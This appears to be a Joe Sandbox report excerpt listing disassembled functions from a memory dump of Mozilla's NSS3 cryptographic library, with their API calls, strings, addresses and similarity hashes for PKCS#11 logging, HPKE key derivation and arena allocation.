Function 6CAB08F0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 230COMMON

Download Yara Rule

APIs

htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6CAB094D
htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB0953
htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 6CAB096E
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 6CAB0974
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6CAB098F
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6CAB0995

Part of subcall function 6CAB1800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CAB1860
Part of subcall function 6CAB1800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6CAB09BF), ref: 6CAB1897
Part of subcall function 6CAB1800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAB18AA
Part of subcall function 6CAB1800: memcpy.VCRUNTIME140(?,?,?), ref: 6CAB18C4

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6CAB0B4F
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6CAB0B5E
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6CAB0B6B
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 6CAB0B78

Strings

secret, xrefs: 6CAB0A88
info_hash, xrefs: 6CAB09E0
exp, xrefs: 6CAB0B36
psk_id_hash, xrefs: 6CAB09B5
key, xrefs: 6CAB0ACB
base_nonce, xrefs: 6CAB0B06

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
String ID: base_nonce$exp$info_hash$key$psk_id_hash$secret
API String ID: 1637529542-763765719
Opcode ID: ca787447de15ad2ff7ca35a06721c00e8727c48aa0efaf251964454bd55a6b58
Instruction ID: 658089f38bf7335e9fa1f183a274d518d3ec93e385f991d57c6aab49605f72cf
Opcode Fuzzy Hash: ca787447de15ad2ff7ca35a06721c00e8727c48aa0efaf251964454bd55a6b58
Instruction Fuzzy Hash: D3818AB5604345AFC700CF54C980DAAF7E8FF88308F048919FA99A7751E731EA59CB92

Function 6CAB89B0 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 149COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GenerateKey), ref: 6CAB89D6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAB8A04
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB8A13

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAB8A29
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CAB8A4B
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6CAB8A67
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6CAB8A83
PR_LogPrint.NSS3( phKey = 0x%p,?), ref: 6CAB8AA1
PL_strncpyz.NSS3(?, *phKey = 0x%x,00000050), ref: 6CAB8B43
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB8B52
PR_LogPrint.NSS3(?,00000000), ref: 6CAB8B68

Strings

*phKey = 0x%x, xrefs: 6CAB8B2D, 6CAB8B3D
pMechanism = 0x%p, xrefs: 6CAB8A46
pTemplate = 0x%p, xrefs: 6CAB8A62
C_GenerateKey, xrefs: 6CAB89D1
phKey = 0x%p, xrefs: 6CAB8A9C
ulCount = %d, xrefs: 6CAB8A7E
(CK_INVALID_HANDLE), xrefs: 6CAB8A0C, 6CAB8B4B
hSession = 0x%x, xrefs: 6CAB89EE, 6CAB89FE

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *phKey = 0x%x$ hSession = 0x%x$ pMechanism = 0x%p$ pTemplate = 0x%p$ phKey = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GenerateKey
API String ID: 1003633598-2039122979
Opcode ID: 3caf3e25437e69b115db14a9e5a693f707437dd78064786c5fc7793cb4eb3e95
Instruction ID: cb8ea4d1ba6003cbca8a991e414d23a3864491407314d2286b1a165f09915bd8
Opcode Fuzzy Hash: 3caf3e25437e69b115db14a9e5a693f707437dd78064786c5fc7793cb4eb3e95
Instruction Fuzzy Hash: E951C63460118AAFDB04DF68DD88E9F7B79EB46758F044029F80477A12DB309D59CBA2

Function 6CA9AB90 Relevance: 33.4, APIs: 22, Instructions: 388COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA9ABCB
EnterCriticalSection.KERNEL32 ref: 6CA9ABE4
TlsGetValue.KERNEL32 ref: 6CA9AC0B
PR_Unlock.NSS3 ref: 6CA9AC7B
TlsGetValue.KERNEL32 ref: 6CA9AC9C
EnterCriticalSection.KERNEL32 ref: 6CA9ACB5
PR_WaitCondVar.NSS3 ref: 6CA9ACD5
TlsGetValue.KERNEL32 ref: 6CA9ACF4

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$CriticalEnterSection$CondUnlockWait
String ID:
API String ID: 839227765-0
Opcode ID: a406b732cf0b4c413b3517765f013a47c131141235298e96657af4344043adc5
Instruction ID: 0fda862cc04c06a55e884c563a72795ef8d0e1be83949606fd0bf3253fd0aa6d
Opcode Fuzzy Hash: a406b732cf0b4c413b3517765f013a47c131141235298e96657af4344043adc5
Instruction Fuzzy Hash: C9F1BFB4A14751CFEB109F78C185759BBF0BF06308F148669D89987B51DB34E8C8CB92

Function 6CAC2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CAC2DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CAC2E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAC2E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAC2E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CA94F1C,?,-00000001,00000000,?), ref: 6CAC2E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CA94F1C,?,-00000001,00000000), ref: 6CAC2E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAC2EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAC2EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAC2EF8
PR_Unlock.NSS3(?), ref: 6CAC2F62
TlsGetValue.KERNEL32 ref: 6CAC2F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6CAC2F9E
PR_Unlock.NSS3(?), ref: 6CAC2FCA
TlsGetValue.KERNEL32 ref: 6CAC301A
EnterCriticalSection.KERNEL32(?), ref: 6CAC302E
PR_Unlock.NSS3(?), ref: 6CAC3066
PR_SetError.NSS3(00000000,00000000), ref: 6CAC3085
PR_Unlock.NSS3(?), ref: 6CAC30EC
TlsGetValue.KERNEL32 ref: 6CAC310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6CAC3124
PR_Unlock.NSS3(?), ref: 6CAC314C

Part of subcall function 6CAA9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CAD379E,?,6CAA9568,00000000,?,6CAD379E,?,00000001,?), ref: 6CAA918D
Part of subcall function 6CAA9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CAD379E,?,6CAA9568,00000000,?,6CAD379E,?,00000001,?), ref: 6CAA91A0

Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707AD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707CD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707D6
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA0204A), ref: 6CA707E4
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,6CA0204A), ref: 6CA70864
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA70880
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,6CA0204A), ref: 6CA708CB
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708D7
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708FB

PR_SetError.NSS3(00000000,00000000), ref: 6CAC316D

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: bd00c75aaeaaa27571b9b621309df9e690761d85c9b7c2360aa0993c8c926cf8
Instruction ID: 5c53b70ea0c00fb3c744827b4ea75af9d442ccae50eb744e4835678ff93cbaeb
Opcode Fuzzy Hash: bd00c75aaeaaa27571b9b621309df9e690761d85c9b7c2360aa0993c8c926cf8
Instruction Fuzzy Hash: 64F19DB5E006089FDF00DF68D844B9EBBB5BF09318F184269EC45A7711EB31E995CB92

Function 6CABAB10 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptMessageNext), ref: 6CABAB36
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CABAB64
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CABAB73

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CABAB89
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6CABABAB
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6CABABC6
PR_LogPrint.NSS3( pCiphertextPart = 0x%p,?), ref: 6CABABE1
PR_LogPrint.NSS3( ulCiphertextPartLen = %d,?), ref: 6CABABFC
PR_LogPrint.NSS3( pPlaintextPart = 0x%p,?), ref: 6CABAC17
PR_LogPrint.NSS3( pulPlaintextPartLen = 0x%p,?), ref: 6CABAC30

Strings

pParameter = 0x%p, xrefs: 6CABABA6
pulPlaintextPartLen = 0x%p, xrefs: 6CABAC2B
C_DecryptMessageNext, xrefs: 6CABAB31
pCiphertextPart = 0x%p, xrefs: 6CABABDC
pPlaintextPart = 0x%p, xrefs: 6CABAC12
ulCiphertextPartLen = %d, xrefs: 6CABABF7
(CK_INVALID_HANDLE), xrefs: 6CABAB6C
ulParameterLen = 0x%p, xrefs: 6CABABC1
hSession = 0x%x, xrefs: 6CABAB4E, 6CABAB5E

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pCiphertextPart = 0x%p$ pParameter = 0x%p$ pPlaintextPart = 0x%p$ pulPlaintextPartLen = 0x%p$ ulCiphertextPartLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptMessageNext
API String ID: 1003633598-206538543
Opcode ID: 2d8154c95d42b6c34bb68593205c71ac9657748a8d8f1962f2f07ad0527c4f80
Instruction ID: ed895220b554fa8925eaf60add31b8c75760670f24576b81749b7cd85c2fdd22
Opcode Fuzzy Hash: 2d8154c95d42b6c34bb68593205c71ac9657748a8d8f1962f2f07ad0527c4f80
Instruction Fuzzy Hash: 4F410635641189AFDB008F94EE48E8E3BB7FB4B75DF084024F50867611CB319D98CBA2

Function 6CABAF20 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6CABAF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CABAF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CABAF83

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CABAF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6CABAFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6CABAFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CABAFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CABB00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CABB028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6CABB041

Strings

pParameter = 0x%p, xrefs: 6CABAFB9
pSignature = 0x%p, xrefs: 6CABB023
C_SignMessage, xrefs: 6CABAF41
ulDataLen = %d, xrefs: 6CABB00A
pData = 0x%p, xrefs: 6CABAFEF
(CK_INVALID_HANDLE), xrefs: 6CABAF7C
ulParameterLen = 0x%p, xrefs: 6CABAFD4
hSession = 0x%x, xrefs: 6CABAF5E, 6CABAF6E
pulSignatureLen = 0x%p, xrefs: 6CABB03C

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage
API String ID: 1003633598-1612141141
Opcode ID: 7f3ae4ccac8f6bebb3bdb16586bb03f76800bb9f42a493472f73078d66ddc1fc
Instruction ID: 6f79be970836e57718c3f742f56c369fe310105e643cf904a42f3b2a58154be5
Opcode Fuzzy Hash: 7f3ae4ccac8f6bebb3bdb16586bb03f76800bb9f42a493472f73078d66ddc1fc
Instruction Fuzzy Hash: AE41F839601089EFDB44CF58ED88F9D7BB6EB4A75DF084024F51867A11DB318998CBA3

Function 6CAEC980 Relevance: 33.3, APIs: 22, Instructions: 298memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,6CAEAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6CAEC98E

Part of subcall function 6CAE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA887ED,00000800,6CA7EF74,00000000), ref: 6CAE1000
Part of subcall function 6CAE0FF0: PR_NewLock.NSS3(?,00000800,6CA7EF74,00000000), ref: 6CAE1016
Part of subcall function 6CAE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA887ED,00000008,?,00000800,6CA7EF74,00000000), ref: 6CAE102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,6CAEAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6CAEC9A1

Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE10F3
Part of subcall function 6CAE10C0: EnterCriticalSection.KERNEL32(?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE110C
Part of subcall function 6CAE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1141
Part of subcall function 6CAE10C0: PR_Unlock.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1182
Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE119C

SECOID_FindOIDByTag_Util.NSS3(0000001A,?,?,?,6CAEAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6CAEC9D3

Part of subcall function 6CAE0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAE08B4

SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000,?,?,?,?,6CAEAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6CAEC9E6

Part of subcall function 6CADFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAD8D2D,?,00000000,?), ref: 6CADFB85
Part of subcall function 6CADFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CADFBB1

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,6CAEAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6CAEC9F5
PORT_ArenaAlloc_Util.NSS3(00000000,00000050,?,?,?,?,?,?,?,6CAEAEB0,?,00000004,00000001,?,00000000,?), ref: 6CAECA0A
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,6CAEAEB0,?,00000004,00000001), ref: 6CAECA33
SECOID_FindOIDByTag_Util.NSS3(00000019,?,?,?,?,?,?,?,?,?,?,?,?,6CAEAEB0,?,00000004), ref: 6CAECA4D
SECITEM_CopyItem_Util.NSS3(00000001,?,00000000), ref: 6CAECA60
SEC_PKCS7DestroyContentInfo.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CAEAEB0,?,00000004), ref: 6CAECA6D
PR_Now.NSS3 ref: 6CAECAD6
PORT_ArenaMark_Util.NSS3(00000000), ref: 6CAECB23
PORT_ArenaAlloc_Util.NSS3(00000000,0000005C), ref: 6CAECB32
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000000,00000001), ref: 6CAECB64
SECOID_SetAlgorithmID_Util.NSS3(00000000,?,00000001,00000000), ref: 6CAECBBB
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CAECBD0
PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6CAECBF6
PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6CAECC18
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000001,00000000), ref: 6CAECC39
PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CAECC5B

Part of subcall function 6CAE10C0: PL_ArenaAllocate.NSS3(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE116E

PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6CAECC69
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6CAECC89

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$CopyItem_$AlgorithmAllocateArena_EncodeFindInteger_Tag_Value$ContentCriticalDestroyEnterErrorFreeInfoInitLockMark_PoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1766420342-0
Opcode ID: 2ad0a098e268c7c12cc33b8b8f5f08fb31a4f9a4247cee7f86152e731482aa7e
Instruction ID: 203d7e52708401337143912ec70a1bb46f161a86f3a04b5f13e0e9cd14222231
Opcode Fuzzy Hash: 2ad0a098e268c7c12cc33b8b8f5f08fb31a4f9a4247cee7f86152e731482aa7e
Instruction Fuzzy Hash: 17B1ADB5D002469FEB00DF65CD40BAA7BB4BF5830CF144129E914A7752EB71E9E8DBA0

Function 6CAC6CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CAC6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CAC6943
Part of subcall function 6CAC6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CAC6957
Part of subcall function 6CAC6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CAC6972
Part of subcall function 6CAC6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CAC6983
Part of subcall function 6CAC6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CAC69AA
Part of subcall function 6CAC6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CAC69BE
Part of subcall function 6CAC6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CAC69D2
Part of subcall function 6CAC6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CAC69DF
Part of subcall function 6CAC6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CAC6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CAC6D8C
free.MOZGLUE(00000000), ref: 6CAC6DC5
free.MOZGLUE(?), ref: 6CAC6DD6
free.MOZGLUE(?), ref: 6CAC6DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CAC6E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAC6E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAC6E72
free.MOZGLUE(?), ref: 6CAC6EA7
free.MOZGLUE(?), ref: 6CAC6EC4
free.MOZGLUE(?), ref: 6CAC6ED5
free.MOZGLUE(00000000), ref: 6CAC6EE3
free.MOZGLUE(?), ref: 6CAC6EF4
free.MOZGLUE(?), ref: 6CAC6F08
free.MOZGLUE(00000000), ref: 6CAC6F35
free.MOZGLUE(?), ref: 6CAC6F44
free.MOZGLUE(?), ref: 6CAC6F5B
free.MOZGLUE(00000000), ref: 6CAC6F65

Part of subcall function 6CAC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CAC781D,00000000,6CABBE2C,?,6CAC6B1D,?,?,?,?,00000000,00000000,6CAC781D), ref: 6CAC6C40
Part of subcall function 6CAC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CAC781D,?,6CABBE2C,?), ref: 6CAC6C58
Part of subcall function 6CAC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CAC781D), ref: 6CAC6C6F
Part of subcall function 6CAC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CAC6C84
Part of subcall function 6CAC6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CAC6C96
Part of subcall function 6CAC6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CAC6CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAC6F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAC6FC5
PK11_GetInternalKeySlot.NSS3 ref: 6CAC6FF4

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID:
API String ID: 1304971872-0
